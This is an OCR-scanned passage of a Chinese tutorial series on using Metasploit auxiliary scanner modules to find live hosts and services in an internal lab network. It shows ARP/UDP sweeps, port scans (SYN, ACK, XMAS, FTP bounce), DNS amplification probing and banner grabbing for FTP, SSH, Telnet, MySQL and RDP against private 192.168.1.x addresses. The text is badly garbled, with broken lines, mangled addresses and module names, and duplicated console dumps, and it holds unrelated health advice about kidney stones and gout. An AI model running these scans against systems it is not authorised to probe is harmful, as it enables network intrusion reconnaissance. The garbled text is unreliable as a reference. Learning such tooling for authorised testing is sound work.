The target address range or CIDR identifier 
The Windows domain to use for authentication 
The rd for the specified username 

The username to authenticate 

The number of concurrent threads 


> exploit 


s running Windows 7 Ultimate SPl (build: 7601) íname:: ) (vorkgroup:WORKGROUP. ) 
% complete) 
complete) 
omplete) 
running Windows 2003 R2 SP2 (build:3790) (name:WINO3X64) 
omplete) 
complete) 
complete) 
complete) 
complete) 
complete) 
i {100% complete) 
execution completed 





=: 基于 scanner/ftp/ftp_version 发 现 FTP 服 务 


1174 






. Name 


Beypaliary(scanner/ftp/ftp_version) > show options 
-N 


ule options (auxiliary/scanner/ftp/ftp_version): 


Current Setting Required Description 
FTPPASS mozilla@example.com no The password for the specified userne 
FIPUSER anonymous no The username to authenticate as 
RHOSTS 192.168.1.0/24 yes The target address range or CIDR ider 
RPORT 21 yes The target port (TCP) 
THREADS 50 yes The number of concurrent threads 


-- auxiliary(scanner/ftp/ftp version) » exploit 


Ty Scanned 51 of 256 hosts (19% complete) 
[|] Scanned 52 of 256 hosts (20% complete) 

Ej Scanned 100 of 256 hosts (39% complete) 
[*] 192.168.1.119:21 - FTP Banner: '220 Microsoft FTP Service\xOd\x0a' 
[*] Scanned 103 of 256 hosts (40% complete) 

Ty Scanned 133 of 256 hosts (51% complete) 

mi] Scanned 183 of 256 hosts (71% complete) 


[3 
Et 
al 
al 
E 


aes 


Scanned 197 of 256 hosts (76% complete) 

Scanned 229 of 256 hosts (89% complete) 

Scanned 231 of 256 hosts (90% complete) 

scanned 256 of 256 hosts (100% complete) 
Auxiliary module execution completed 


aUxlliary (scanner sftp/ftp version) > show options 


options (auxiliary/scanner/ftp/ftp version): 


Current Setting Required Description 


mple.com n The password for the specified username 
The username to authenticate as 
192.168.1.0/24 yes The target address range or CIDR identifier 
21 113 The target port (TCP) 
yes The number of concurrent threads 


anner ftps ftp. version) > exploit 


“Canned 51 of 256 hosts (19% complete) 








ined 52 of 256 hosts (20% complete) 

ed 100 of 256 hosts (39% complete) 
- FTP Banner: '220 Microsoft FTP Service\xGd\x0a' 

sts (40% complete) 

; (51% complete) 

(71% complete) 

(76$ complete) 

sts (89% complete) 

6 hosts (90$ complete} 

e 256 hosts {100% complete) 

lliary module execution completed 
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四 : 基于 scanner/discoverylarp_sweep 发 现 内 网 存活 主机 


msf auxiliary(scanner/discovery/arp sweep) > show options 


Module options (auxiliary/scanner/discovery/arp sweep): 


Name Current Setting Required Description 

INTERFACE no The name of the interface 

RHOSTS 192.168.1.0/24 yes The target address range or CIDR identj 
SHOST no Source IP Address 

SMAC no Source MAC Address 

THREADS 50 yes The number of concurrent threads 
TIMEOUT 5 yes The number of seconds to wait for newe 


msf auxiliary(scanner/discovery/arp sweep) > exploit 


[*] 192.168.1.1 appears to be up (UNKNOWN). 

[*] 192.168.1.2 appears to be up (UNKNOWN). 

[+] 192.168.1.119 appears to be up (VMware, Inc.). 
[*] Scanned 256 of 256 hosts (100% complete) 

[*] Auxiliary module execution completed 


auxiliary (scanner discavery.<arp sweep) > show options 
Module options lauxiliary/scanner/discovery/arp_sweep}: 


Name Current Setting Required Description 

INTERFACE 1 The name of the interface 

RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier 
OST x Source IP Addr 

SMAC 0 Source MAC Addre 

THREADS 50 yes The number of concurrent threads 

TIMEOUT 5 yes The number of seconds to wait for new data 


f auxiliary (scanner discoveryarp sweep) > exploit 


192.168.1.1 appears to be up (UNKNOWN) 
58.1.2 appears to be up (UNKNOWN). 
1.119 appears to be up (VMware, Inc.) 
ied 256 of 256 hosts (100% complete) 
module execution completed 





E: 基于 scanner/discoveryludp_sweep 发 现 内 网 存活 主机 
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1 Pest auxiliary(scanner/discovery/udp sweep) > show options 


Bue options (auxiliary/scanner/discovery/udp. sweep): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to probe in each se 
RHOSTS 192.168.1.0/24 yes The target address range or CIDR identi 
THREADS 50 yes The number of concurrent threads 


msf auxiliary(scanner/discovery/udp sweep) > exploit 


Gl Sending 13 probes to 192.168.1.0->192.168.1.255 (256 hosts) 

iz | Discovered DNS on 192.168.1.1:53 (ce2a850000010001000000000756455253494f4e04 
E] Discovered NetBIOS on 192.168.1.2:137 (JOHN-PC:<00>:U :WORKGROUP:<@0>:G :JOF 
[*] Discovered NetBIOS on 192.168.1.119:137 (WINOQ3X64:<O00>:U :WINO3X64:<20>:U :h 
[*] Scanned 256 of 256 hosts (100% complete) 

[*] Auxiliary module execution completed 


ES > 
auxiliary (scanner discovery udp sweep) > show options 
dule options (auxiliary/scanner/discovery/udp sweep}: 
Current Setting Required Description 
The number of hosts to probe in each set 
192.168.1.0/24 yes The target address range or CIDR identifier 


50 yes The number of concurrent threads 


auxiliary(sc d: ery;udp sweep) > exploit 


Sending 13 probes to 192.168.1.0-»192.168.1.255 (256 hosts) 


>: U WORKGROUP: <00>:G : JOHN-PC: 


overed NetBIOS on 192.168.1.119:137 (WINOSX64:<00>;U :WINO3X64:«20»:U. : WORKGRI 
29:85:d6:7d) 
of 256 hosts (100% complete) 
‘uxlliary module execution completed 
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基于 MSF 发 现 内 网 存活 主机 第 二 季 


。 攻击 机 : 192.168.1.5 Debian 

。 靶 机 : 192.168.1.2 Windows 7 
o 192.168.1.115 Windows 2003 
o 192.168.1.119 Windows 2003 


第 一 季 主要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


e auxiliary/scanner/discovery/arp sweep 
。 auxiliary/scanner/discovery/udp sweep 
。 auxiliary/scanner/ftp/ftp version 

e auxiliary/scanner/http/http version 

* auxiliary/scanner/smb/smb version 


第 二 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/ssh/ssh version 

* auxiliary/scanner/telnet/telnet version 
e auxiliary/scanner/discovery/udp probe 
e auxiliary/scanner/dns/dns amp 

。 auxiliary/scanner/mysql/mysql version 


X: &"Fauxiliary/scanner/ssh/ssh version ISSHI RI 
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Be options (auxiliary/scanner/ssh/ssh version): 


od 


Current Setting Required Description 


192.168.1.0/24 yes The target address range or CIDR identifi 
22 yes The target port (TCP) 
THREADS 50 yes The number of concurrent threads 
TIMEOUT 30 yes Timeout for the SSH probe 


H92:168.1.5:22 - SSH server version: SSH-2.0-OpenSSH 7.9pi1 Debian-5 ( 
Scanned 52 of 256 hosts (20% complete) 

Scanned 95 of 256 hosts (37% complete) 

Scanned 100 of 256 hosts (39% complete) 

Scanned 103 of 256 hosts (40% complete) 

Scanned 131 of 256 hosts (51% complete) 

Scanned 154 of 256 hosts (60% complete) 

Scanned 180 of 256 hosts (70% complete) 

| Scanned 206 of 256 hosts (80% complete) 

Scanned 235 of 256 hosts (91% complete) 

Scanned 256 of 256 hosts (100% complete) 

Auxiliary module execution completed 


ssh version) > show options 


ns (auxiliary/scanner/ssh/ssh version): 


The 

The target port (TCP) 

The number of concurrent threads 
yes Timeout for the SSH probe 


sh version) > exploit 


.banner 
mplete}) 
37% complete) 
39% complete) 


8 hosts (40% complete) 
5 hosts (51% complete) 
2 omplete) 
(70% complete) 
complete) 

> complete) 


msf auxiliary(scanner/telnet/telnet version) > show options 


Module options (auxiliary/scanner/telnet/telnet version): 


Name 


PASSWORD 


RHOSTS 
RPORT 


THREADS 
TIMEOUT 
USERNAME 


Current Setting 


192:168:1.119 


23 
50 
30 


Required 


Description 


The 


Timeout for the Telnet probe 













password for the specified username 
target address range or CIDR identit 
target port (TCP) 
number of concurrent threads 


The username to authenticate as 


msf auxiliary(scanner/telnet/telnet_version) > exploit 


[*] 192.168.1.119:23 
[^] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


msf auxiliary( 


Module options (auxiliary 


RHOSTS 
RPORT 
THREADS 
TIMEOUT 
USERNAME 


Scanned 1 of 1 


Auxiliary madule 


- 192.168.1.119:23 TELNET Welcome to Microsoft Telnet 


1 


anner/telnet/telnet_ve 


D 


> show options 


Sion): 


ord for the specified username 


rget addr r 
The target port } 
The number of concur 


Timeout for the Telnet probe 
‘name to authenticate as 


The us 


} 


> exploit 


92.168.1.119:23 TELNET Welcome to Mic 


(166 
ecution 


complete) 
completed 


/\: 基于 scanner/discovery/udp_probe 发 现 内 网 存活 主机 
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ge or CIDR identifier 


rent threads 


oft Telnet Service \ 


Oa NxOdlogin 














6 







p auxiliary(scanner/discovery/udp_probe) > show options 


Name Current Setting Required Description 

EE o 0--—---- ----------- 

p CHOST no The local client address 

id RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifi 
THREADS 50 yes The number of concurrent threads 


msf auxiliary(scanner/discovery/udp probe) > exploit 


[+] Discovered NetBIOS on 192.168.1.2:137 (JOHN-PC:<00>:U :WORKGROUP :<00>:G :JOF 
[+] Discovered DNS on 192.168.1.1:53 (de77850000010001000000000756455253494f4e04 
[*] Scanned 43 of 256 hosts (16% complete) 

[*] Scanned 52 of 256 hosts (20% complete) 

[*] Scanned 89 of 256 hosts (34% complete) 

[+] Discovered NetBIOS on 192.168.1.119:137 (WIN03X64:«00»:U :WIN03X64:«20»:U :h 
Scanned 103 of 256 hosts (40% complete) 

Scanned 140 of 256 hosts (54% complete) 

Scanned 163 of 256 hosts (63% complete) 

Scanned 184 of 256 hosts (71% complete) 

Scanned 212 of 256 hosts (82% complete) 

Scanned 231 of 256 hosts (90% complete) 

Scanned 256 of 256 hosts (100% complete) 

Auxiliary module execution completed 


* 


FN i 


qme tom E e ER 
* »* 


»*. * 


»* 
— c kw ed 


* 


»* 


"Tm n 
Erg 
v 


l liary {scannery discoverysodp probe) > show options 


e options (auxiliary/scanner/discovery/udp probe): 
Current Setting Required Description 


The local client address 
The target address range or CIDR identifier 
The number of concurrent threads 


discovery;udp probe) > exploit 
scovered NetBIOS on 192.168.1.2:137 (JOHN-PC:«00»:U :WORKGRQUP:«00»:G :JOHN-P: >: U WORKGROUP: < 
:53 (de77850000010001 000000000756455253494f 4e0442494e440000100003c 00c 00 


» complete) 
complete) 
5 hosts (34$ complete} 
on 192.168.1.119:137 (WINO3X64:-00»:U :WINO3X64: <20> “WORKGROUP: <00>: G : WORKGRO 
d6:7d) 
t 256 hosts (40% complete) 
of 256 hosts (54$ complete) 
f 256 hosts (63$ complete) 
f 256 hosts (719 complete) 
hosts (82% complete} 
hosts (90% complete) 
A 256 hosts (100% complete) 
biliary module execution completed 
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九 : 基于 auxiliary/scanner/dns/dns_amp 发 现 内 网 存活 主机 


msf auxiliary(scanner/dns/dns amp) > show options 


Module options (auxiliary/scanner/dns/dns amp): 


Name Current Setting 
BATCHSIZE 256 

DOMAINNAME  isc.org 

FILTER 

INTERFACE 

PCAPFILE 

QUERYTYPE ANY 

RHOSTS 192.168.1.0/24 
RPORT 53 

SNAPLEN 65535 

THREADS 50 

TIMEOUT 500 


msf auxiliary(scanner/dns/dns amp) » exploit 


Required Description 


yes 
yes 





The number of hosts to probe in each; 
Domain to use for the DNS request 1 
The filter string for capturing traffj 
The name of the interface 

The name of the PCAP capture file tor 
Query type(A, NS, SOA, MX, TXT, AAAA, 


The target address range or CIDR ident 
The target port (UDP) 

The number of bytes to capture 

The number of concurrent threads 

The number of seconds to wait for new 


Mad 


Sending DNS probes to 192.168.1.0->192.168.1.255 (256 hosts) 
Sending 67 bytes to each host using the IN ANY isc.org request 
192.168.1.1:53 - Response is 530 bytes [7.91x Amplification] 
Scanned 256 of 256 hosts (100% complete) 

Auxiliary module execution completed 


auxiliary (scanner/dns?dns amp) > show options 


amp} $ 


ule options {auxillary/scanner/dns/dr 


Name Current Setting Required Description 


BATCHSIZE 
DOMAINNAME 
FILTER 
INTERFACE 


The number of hosts to probe in each set 
Domain to use for the DNS request 

The filter string for capturing traffic 

The name of the interface 

The name of the PCAP capture file to process 
Query (A, SOA, MX, TXT, AAA, RRSIG, 
The range or CIDR identifier 
The 
The 
The 
The 


18C.0 


ANY 
192.1698.1. 
53 

65535 

50 

500 


number 
number 
number 


SNAPLEN 
THREADS 
TIMEOUT 


of bytes to capture 
of concurrent threads 
of seconds to wait for new data 


f auxiliary( 


Sending 
Sending 


ONS probes to 192.168,1.0-2192. 

67 bytes to each host using the IN 
192.168.1.1:53 - Response is 530 bytes [7. 
Scanned 256 of 256 hosts (100% complete) 
Auxiliary module execution completed 


g uest 
implification] 





&-Tauxiliary/scanner/mysgl/mysql version iimysqlBg 2s 
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DNSKEY , 


ANY) 





Name Current Setting Required Description 

- RHOSTS 192.168.1.115 yes The target address range or CIDR identifi 
I RPORT 3306 yes The target port (TCP) 

E THREADS 50 yes The number of concurrent threads 


auxiliary(scanner/mysql/mysql version) » exploit 


192.168.1.115:3306 - 192.168.1.115:3306 is running MySQL 5.1.52-community 
Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Y) > show options 


e options (auxiliary/scanner/mysql/mysgl version): 


Current Setting Required Description 
The target address range or CIDR identifier 
The target port {TCP} 
The number of concurrent threads 


e complete) 
ary module execution completed 
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基于 MSF 发 现 内 网 存活 主机 第 三 季 


注 :请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 紊乱 等 多 种 代谢 性 疾病 。 


攻击 机 : 192.168.1.5 &Debian 
靶 机 : 192.168.1.2 & Windows 7 
192.168.1.115 &Windows 2003 
192.168.1.119& Windows 2003 


第 一 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/discovery/arp sweep 
。 auxiliary/scanner/discovery/udp sweep 
¢ auxiliary/scanner/ftp/ftp version 

e auxiliary/scanner/http/http version 

e auxiliary/scanner/smb/smb version 


第 二 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


e auxiliary/scanner/ssh/ssh_version 

。 auxiliary/scanner/telnet/telnet version 
。 auxiliary/scanner/discovery/udp probe 
e auxiliary/scanner/dns/dns amp 

e auxiliary/scanner/mysql/mysql_version 


第 三 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/netbios/nbname 
。 auxiliary/scanner/http/title 

。 auxiliary/scanner/db2/db2 version 
。 auxiliary/scanner/portscan/ack 

e auxiliary/scanner/portscan/tcp 


。 十 一 : 基于 auxiliary/scannernetbios/nbname 发 现 内 网 存活 主机 
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x 


puxiliary (scanner /netbios/nbname ) > show options 


Current Setting Required Description 







256 yes The number of hosts to probe in each se 
; 192.168.1.0/24 yes The target address range or CIDR identi 
= RPORT 137 yes The target port (UDP) 
THREADS 50 yes The number of concurrent threads 


M 


} > show options 
canner/netbios/nbname): 


Current Setting Required Description 


The number of to probe in each set 
The target address range or CIDR identifier 
The target port (UDP) 

The number of concurrent threads 


) » exploit 


[VM 


3.1.119 (WIN 


msf auxiliary(scanner/http/title) » show options 


Module options (auxiliary/scanner/http/title): 


Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:y 
RHOSTS 192.168.1.115,119 yes The target address range or CIDR ic 
RPORT 80 yes The target port (TCP) 

SHOW TITLES true yes Show the titles on the console as t 
SSL false no Negotiate SSL/TLS for outgoing conr 
STORE NOTES true yes Store the captured information inr 
TARGETURI / yes The base path 

THREADS 50 yes The number of concurrent threads 


msf auxiliary(scanner/http/title) » exploit 


[*] [192.168.1.115:80] [C:200] [R:] [S:Microsoft-IIS/6.0] 协同 管理 系统 
[*] Scanned 2 of 2 hosts (100% complete) 
[*] Auxiliary module execution completed 


e€) > show aptians 


Madule options (auxilia anner/http/title): 


Name Current Setting le ed. Description 


A chain of format type:host:port[,type:host:port 
192.168 get address range or CIDR identifier 
80 The target part (TCP) 
true Show the titles on the console as they are grabbed 
false egotiate SSL/TLS for outgoing connections 
STORE_NOTES true yes Store the captured information in notes. Use “notes - 
TARGETUR / The base path 
) | The number of concurrent threads 


» exploit 


[R:] [S:Microsoft-IIS/6.0] th 
complete) 





。 +=: 基于 auxiliary/scanner/db2/db2_version 发 现 db2 服 务 
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* 


msf auxiliary(scanner/http/title) > use auxiliary/scanner/dp dbz version 
E auxiliary(scanner/db2/db2 version) » show options 


Module options (auxiliary/scanner/db2/db2 version): 


Name Current Setting Required Description 

DATABASE toolsdb yes The name of the target database 

RHOSTS 192.168.1.0/24 yes The target address range or CIDR identif 
RPORT 50000 yes The target port (TCP) 

THREADS 50 yes The number of concurrent threads 

TIMEOUT 5 yes Timeout for the DB2 probe 


msf auxiliary(scanner/db2/db2 version) » exploit 


quxiliaryisScanner d2 dB version) > snow options 


dule options {auxillary/scanner/db2/db2 version): 


Current Setting Required Description 


toolsdb yes The name of the target database 
192.168.1. The target address range or CIDR identifier 
30000 yes The target port {TCP} 
50 T3 The number of concurrent threads 
TIMEQUT 5 y Timeout for the DB2 probe 


t auxiliary(scannerdb2‘db2 version) > exploit 





* +: 基于 auxiliary/scannerportscan/ack 发 现 内 网 存活 主机 


3 1187 


msf auxiliary(scanner/portscan/ack) » show options 


Module options (auxiliary/scanner/portscan/ack): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to scan per set 
DELAY 0 yes The delay between connections, per tf 
INTERFACE no The name of the interface 

JITTER 0 yes The delay jitter factor (maximum vali 
PORTS 445 yes Ports to scan (e.g. 22-25, 80, 110-990) 
RHOSTS 192.168.1.115,119 yes The target address range or CIDR ide 
SNAPLEN 65535 yes The number of bytes to capture 
THREADS 50 yes The number of concurrent threads 
TIMEOUT 500 yes The reply read timeout in millisecone 


msf auxiliary(scanner/portscan/ack) > exploit 
[*] TCP UNFILTERED 192.168.1.115:445 
[*] TCP UNFILTERED 192.168.1.119:445 
[*] Scanned 2 of 2 hosts (100% complete) 
[*] Auxiliary module execution completed 


* 


ST aUXl1L1arYy (St ar POPU scans ack) > snow options 


Module options (auxiliary/scanner/portscan/ack): 


Name Current Setting Required Description 


BATCHSIZE 256 yes he number of hosts to scan per set 

DELAY 6 yes he delay between connections, per thread, in milliseconds 

INTERFACE 0 name of the interface 

JITTER è he delay jitter factor (maximum value by which to +/- DELA 
3 z Ports to scan (e.g. 25, 


98.1. 115,115 The target address range or CIDR identifier 
The number of by to capture 
ADS The number of concurrent thr 
TIMEOUT 500 yes The reply read timeout in mill 


sf auxiliary (se. ck) > exploit 


TCP UNFILTERED 192 .115:445 

TCP UNFILTERED 192.1 .119:445 

Scanned 2 of 2 hosts (100% complete) 
*] Auxiliary module execution completed 





。 十 五 : 基于 auxiliary/scanner/portscanltcp 发 现 内 网 存活 主机 
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vin 






Current Setting Required 
CONCURRENCY 10 yes 
DELAY 0 yes 
JITTER © yes 
PORTS 445 yes 
RHOSTS 192.168.1.115,119,2 yes 
THREADS 50 yes 
TIMEOUT 1000 yes 


msf auxiliary(scanner/portscan/tcp) » exploit 


[*] 892.168.1.2: = 192.168.1.2:445 - 
[*] Scanned 1 of 3 hosts (33% complete) 

8510192.168.1.119: - 192.168.1.119:445 
8511192.168.1.115: =- 192.168.1.115:445 


[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed 


attep) > show options 
anner/portscan/tcp): 
Current Setting Required 


NCURRENCY 


Ports to scan 
192.168.1,115,119,2 The target addres 


Description 

The number of concurrent ports tc 
The delay between connections, pe 
The delay jitter factor (maximum 
Ports to scan (e.g. 22-25,80,110- 
The target address range or CIDR 
The number of concurrent threads 
The socket connect timeout in mil 


TCP OPEN 


TCP OPEN 
TCP OPEN 


per thread, in milliseconds 

um value by which to +/- DELAY) in milliseconds, 
,110-900) 
CIDR identifier 


50 The number of concurrent threads 
1000 The socket connect timeout in milliseconds 


- TCP OPEN 
j.1.119:445 - TCP OPEN 


.168.1.115:445 - TCP OPEN 
complete) 
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基于 MSF 发 现 内 网 存活 主机 第 四 季 


请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 


痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 紊乱 等 多 种 代谢 性 疾病 。 


攻击 机 : 192.168.1.5&Debian 
靶 机 : 192.168.1.2&Windows 7 
192.168.1.115&Windows 2003 
192.168.1.119&Windows 2003 


第 一 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


* 


第 三 


第 三 


auxiliary/scanner/discovery/arp sweep 
auxiliary/scanner/discovery/udp sweep 
auxiliary/scanner/ftp/ftp version 
auxiliary/scanner/http/http version 
auxiliary/scanner/smb/smb version 


季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


auxiliary/scanner/ssh/ssh version 
auxiliary/scanner/telnet/telnet version 
auxiliary/scanner/discovery/udp probe 
auxiliary/scanner/dns/dns amp 
auxiliary/scanner/mysgl/mysql version 


季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


auxiliary/scanner/netbios/nbname 
auxiliary/scanner/http/title 
auxiliary/scanner/db2/db2 version 
auxiliary/scanner/portscan/ack 
auxiliary/scanner/portscan/tcp 


第 四 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 ; 


auxiliary/scanner/portscan/syn 
auxiliary/scanner/portscan/ftpbounce 
auxiliary/scanner/portscan/xmas 
auxiliary/scanner/rdp/rdp_scanner 
auxiliary/scanner/smtp/smtp_version 


十 六 : 基于 auxiliary/scanner/portscan/syn 发 现 内 网 存活 主机 
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[options (auxiliary/scanner/portscan/syn): 


Current Setting Required Description 


256 yes The number of hosts to scan per set 

0 yes The delay between connections, per thre 
no The name of the interface 

0 yes The delay jitter factor (maximum value 

445 yes Ports to scan (e.g. 22-25,80,110-900) 

H92:168.1.115 yes The target address range or CIDR identi 

65535 yes The number of bytes to capture 

50 yes The number of concurrent threads 

500 yes The reply read timeout in milliseconds 


uxiliary(scanner/portscan/syn) » exploit 


TCP OPEN 192.168.1.115:445 
Scanned 1 of 1 hosts (100% complete) 





) » show options 
(auxiliary/scanner/portscan/syn): 


current Setting Required Description 
The number of hosts to scan per set 
The delay between connections, per thread, in milliseconds 
The name of the interface 
The del itter factor (maximum value by which to +/- DELAY) in milliseconds. 
Ports to scan ( 22-25,80.110-900) 
The target ad nge IDR identifier 
The number of b to capture 
The number of concurrent threads 
The reply read timeout in milliseconds 


) » exploit 


% complete) 
tion completed 
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msf auxiliary(scanner/portscan/ftpbounce) » show options 


Module options (auxiliary/scanner/portscan/ftpbounce): 


Name 
BOUNCEHOST 
BOUNCEPORT 
DELAY 
FTPPASS 
FTPUSER 
JITTER 
PORTS 
RHOSTS 
THREADS 


Current Setting 


192.169:1.119 yes FTP 
21 yes FTP 
0 yes The 
mozilla@example.com no The 
anonymous no The 
9 yes The 
22-25 yes 
19250268; 0 10119 yes 
50 yes 


Required Description 


relay host 
relay port 


delay between connections, 
password for the specified 
username to authenticate ag? 
delay jitter factor (maximum, 
Ports to scan (e.g. 22-25, 80, 110 
The target address range or CIpRy 
The number of concurrent threads § 


msf auxiliary(scanner/portscan/ftpbounce) > exploit 


192 LON 1 
192: 169515 
192.168.1. 
192.168.1. 
1927168.1. 
Auxiliary 


[*] 
[*] 
[+] 
[*] 
LY 
b] 


auxiliary (scammer; D 


Module options (auxilia 


Name Current 


BOUNCEHOST 


RH ) 
THREADS 


119:21 - TCP OPEN 192.168.1.119:22 

119:21 - TCP OPEN 192.168.1.119:23 

119:21 - TCP OPEN 192.168.1.119:24 

11921 = TCP 0PEN-192:7165.1.119:25 

119:21 - Scanned 1 of 1 hosts (100% complete) 
module execution completed 


orts 
ry/scanner/ 


Settinq 





















per thread, in milliseconds 


Ports to 
The targ 
The number of concurrent t 


TCP OPEN 19. 

TCP OPEN 19 

TCP OPEN 19 : 
TCP OPEN 192.168.1.1 


- Scanned 1 of 1 h 


[63 Auxiliary module ex 


ecution completed 


sername 


by which to +/- 





。 +/\: 基于 auxiliary/scannerportscan/xmas 发 现 内 网 存活 主机 
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DELAY) in millisecond 









f auxiliary(scanner/portscan/xmas) » show options 


dule options (auxiliary/scanner/portscan/xmas) : 


Current Setting Required Description 


Name 
BATCHSIZE 256 yes The number of hosts to scan per set 
DELAY 0 yes The delay between connections, per thre 
INTERFACE no The name of the interface 
JITTER 0 yes The delay jitter factor (maximum value 
; PORTS 80 yes Ports to scan (e.g. 22-25,80,110-900) 
E RHOSTS 192.168.1.119 yes The target address range or CIDR identi 
r SNAPLEN 65535 yes The number of bytes to capture 
É THREADS 50 yes The number of concurrent threads 
| TIMEOUT 500 yes The reply read timeout in milliseconds 


t 
[^4 
tt 


portscan xias) » show options 
s (auxiliary/scanner/portscan/x 
Current Setting Required Description 


The number of hosts to scan per set 
yes The delay between connections, per thread, in milliseconds 
li: ! The name of the interface 
| ( | jitter factor (maximum value by which to +/- DELAY) in milliseconds. 
scan (e.g. 22-25,80,110-900) 
t address range or CIDR identifier 
The number of bytes to capture 
The number of concurrent threa 
The reply read timeout in mill 


iliaryt portscan/xpas) > exploit 


canned 1 of 1 ho {100% complete) 
iliary module execution completed 





* Hh: 基于 auxiliary/scanner/rdp/rdp_scanner 发 现 内 网 存活 主机 
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msf auxiliary(scanner/rdp/rdp scanner) » show options 


Module options (auxiliary/scanner/rdp/rdp scanner): 





Name Current Setting Required Description 

CredSSP true yes Whether or not to request Credssp 
EarlyUser false yes Whether to support Earlier User Aut 
RHOSTS 192.168.1.2,115,119 yes The target address range or CIDR ic 
RPORT 3389 yes The target port (TCP) 

THREADS 50 yes The number of concurrent threads 
TES true yes Wheter or not request TLS security 


msf auxiliary(scanner/rdp/rdp scanner) » exploit 


[*] Scanned 1 of 3 hosts (33% complete) 


[*] 192.168.1.115:3389 - Identified RDP 
[*] Scanned 2 of 3 hosts (66% complete) 
[*] 192.168.1.119:3389 - Identified RDP 


[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed 


msf auxiliary (scanner /rdp/rdp scanner) > show options 


Module options (auxiliary/scanner/rdp/rdp scanner) 
Current Setting Required Description 


Whether or not to request CredSS 
é Whether to support Earlier User Authorization Result PDU 
RHOSTS : j The target address range or CIDR identifier 
RPORT 3389 The target port (TCP) 
THREADS Q y The number of concurrent threads 


TLS B Wheter or not request TLS security 


Scanned 1 of 3 ho ( complete) 
168.1. - Identified RDP 
nned 2 of 3 sts (66% complete) 
- Identified RDP 
(100& complete) 
ary module cution completed 





。 Z+: 基于 auxiliary/scanner/smtp/smtp_version 发 现 内 网 存活 主机 
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msf auxiliary(scanner/smtp/smtp version) > show options 


Module options (auxiliary/scanner/smtp/smtp version): 


Name Current Setting Required Description 

RHOSTS — 192.168.1.5 yes The target address range or CIDR identifi 
RPORT 25 yes The target port (TCP) 

THREADS 50 yes The number of concurrent threads 


msf auxiliary(scanner/smtp/smtp version) » exploit 


« au % 


f auxiliary (Scanner smtp/ smtp version) > show options 


jule options (auxiliary/scanner/smtp/smtp version): 


Current Setting Required Description 
The target address range or CIDR identifier 
The target port (TCP) 
The number of concurrent threads 


p/sttp version) > exploit 


| Scanned 1 of 1 hosts (100% complete) 
| Auxiliary module execution completed 
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基于 MSF 发 现 内 网 存活 主机 第 五 季 


注 :请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 紊乱 等 多 种 代谢 性 疾病 。 


攻击 机 : 192.168.1.102 &Debian 
靶 机 : 192.168.1.2&Windows 7 
192.168.1.115&Windows 2003 
192.168.1.119&Windows 2003 


第 一 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


e auxiliary/scanner/discovery/arp sweep 
e auxiliary/scanner/discovery/udp sweep 
* auxiliary/scanner/ftp/ftp version 

e auxiliary/scanner/http/http version 

e auxiliary/scanner/smb/smb, version 


第 二 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/ssh/ssh version 

。 auxiliary/scanner/telnet/telnet version 
e auxiliary/scanner/discovery/udp probe 
* auxiliary/scanner/dns/dns amp 

* auxiliary/scanner/mysdl/mysql version 


第 三 季 主要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


* auxiliary/scanner/netbios/nbname 
。 auxiliary/scanner/http/title 

。 auxiliary/scanner/db2/db2 version 
。 auxiliary/scanner/portscan/ack 

* auxiliary/scanner/portscan/tcp 


第 四 季 主要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


e auxiliary/scanner/portscan/syn 

。 auxiliary/scanner/portscan/ftpbounce 
。 auxiliary/scanner/portscan/xmas 

。 auxiliary/scanner/rdp/rdp scanner 

。 auxiliary/scanner/smtp/smtp version 


第 五 季 主 要 介绍 scanner 下 的 三 个 模块 ， 以 及 db_nmap 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/pop3/pop3 version 

。 auxiliary/scanner/postgres/postgres version 
。 auxiliary/scanner/ftp/anonymous 

。 db nmap 
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: —. Name Current Setting Required Description 
Bu RHOSTS 192.168.1.110-120 yes The target address range or CIDR identi 


RPORT 110 yes The target port (TCP) 
THREADS 50 yes The number of concurrent threads 


= 
ki 
1 
VB 4 
mst auxiliary(scanner/pop3/pop3_version) > exploit 


E *] Scanned 5 of 11 hosts (45% complete) 
